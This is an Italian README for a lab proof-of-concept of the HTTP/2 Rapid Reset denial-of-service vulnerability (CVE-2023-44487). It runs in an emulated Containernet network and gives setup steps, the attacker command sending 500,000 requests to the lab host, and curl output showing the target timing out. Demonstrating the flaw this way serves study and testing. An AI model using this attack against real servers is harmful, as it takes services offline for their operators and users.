
PoC per la vulnerabilità DDoS Rapid Reset su HTTP/2 - CVE-2023-44487
Questo progetto dimostra l'attacco Denial of Service (DoS) HTTP/2 Rapid Reset utilizzando una topologia di rete personalizzata creata con Containernet. L'attacco sfrutta vulnerabilità nel protocollo HTTP/2 per sopraffare un server di destinazione, rendendolo non rispondente.

Per installare i pacchetti necessari, esegui i seguenti comandi:
./install.sh
Per modificare la directory di installazione predefinita, puoi modificare la variabile INSTALL_DIR in questo modo:
INSTALL_DIR=/custom/path ./install.sh
Per avviare l'infrastruttura, esegui i seguenti comandi:
source ~/.containernet/containernet/venv/bin/activate
sudo -E env PATH=$PATH ./topo.py
Per avviare l'attacco, esegui il seguente comando nel container attaccante:
./attacker -url='https://modern.art:443/api' -requests=500000
Dopo alcuni istanti, quando provi ad accedere al sito web tramite curl, esso diventa non responsivo.
root@attacker:/attacker# curl -k https://modern.art/
curl: (28) SSL connection timeout
Per fermare l'infrastruttura, basta digitare exit nel terminale dove è in esecuzione topo.py.